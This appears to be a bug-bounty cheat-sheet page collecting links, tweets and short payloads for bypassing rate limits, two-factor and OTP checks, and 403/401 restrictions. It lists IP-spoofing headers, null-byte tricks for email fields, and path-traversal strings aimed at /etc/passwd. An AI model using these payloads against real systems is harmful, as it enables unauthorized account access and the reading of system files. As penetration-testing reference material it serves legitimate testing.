# Rate Limit Bypass / 2FA / OTP Bypass

* <https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd>

{% embed url="<https://twitter.com/harrmahar/status/1247306384128872448>" %}

{% embed url="<https://twitter.com/udit_thakkur/status/1241832273898430464>" %}

* Wanna Bypass Rate Limit ? Try Bypass with adding null payload %00, %0d%0a, %09, %0C, %20, %0 on email. Not Works ? Just try adding "blank space" on the email, works!
* <https://shahmeeramir.com/4-methods-to-bypass-two-factor-authentication-2b0075d9eb5f>

```
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
True-Client-IP: IP
X-Real-IP: IP
```

I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. [#bugbountyTips](https://twitter.com/hashtag/bugbountyTips?src=hashtag_click) [#pentestTips](https://twitter.com/hashtag/pentestTips?src=hashtag_click) Last /setup/ endpoint was by attacker while the first one is as victim.[![Image](https://pbs.twimg.com/media/EWHB2DOUMAAfudW?format=png\&name=medium)](https://twitter.com/imhaxormad/status/1252495614161506309/photo/1)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MFnpthbu_XU6rCBzm_e%2F-MFoFgskwIajJ3zBU0N2%2Fimage.png?alt=media\&token=a6f3972e-1912-435e-ac4f-5b0c95d6bc9b)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MTFqRp-yPp8njZocDEN%2F-MTFx8sSGKlcFTuYwZWq%2Fimage.png?alt=media\&token=ca685644-55b2-44e9-b6b4-2f71b5ee41cb)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MTG0p8wfy7Od-0RQ9Gr%2F-MTG12T92LzRkjHXS98h%2Fimage.png?alt=media\&token=05d05260-c33e-4e42-95bf-68d156f4798c)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MWEKOIX73MDy6bxkMB1%2F-MWEKRH0xkzO1FhzCDdH%2Fimage.png?alt=media\&token=556bdc88-f609-4eed-9049-9796053c4f64)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MWEKtK3XDIKFoKmsd0n%2F-MWEL0XZK12wfReAGrOD%2Fimage.png?alt=media\&token=a0d5b3f5-3f62-4b67-bfa3-fe725df9684e)

{% embed url="<https://twitter.com/harshbothra_/status/1345044218276839424?s=20>" %}

[How to find authentication bypass vulnerabilities. Focus. I Added headers. Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found #bugbounty #bugbountytips](https://twitter.com/M404ntf/status/1347919441296809984?s=20)

* <https://blog.cobalt.io/bypassing-the-protections-mfa-bypass-techniques-for-the-win-8ef6215de6ab>
* <https://notifybugme.medium.com/unauthorized-access-to-admin-setpassword-page-by-bypass-403-forbidden-f10bbb92ab35>

{% embed url="<https://twitter.com/santosomar/status/1433191775041118208?s=20>" %}

[everytime yu face a 401 Unauthorized respense add this header to the request : X-Custom-IP-Authorization: 127.0.0.1 #bugbountytips](https://twitter.com/K0to4m4tsukami/status/1365058637887078406?s=20) / X-Forwarded-Origin: 127.0.0.1

Bug Bounty Technique:

GET /page.php?path=../../etc/passwd

Forbidden 403 ?

Try One Of These:

(1)../../../etc/passwd%00

(2)....//....//....//etc/passwd

(3)%252e%252e%252fetc%252fpasswd

{% embed url="<https://twitter.com/FaniMalikHack/status/1395042756108505092?s=20>" %}

2FA - <https://mazoka777.medium.com/two-factor-authentication-bypass-4c814627f8c3>

{% embed url="<https://github.com/aufzayed/bugbounty/tree/main/403-bypass>" %}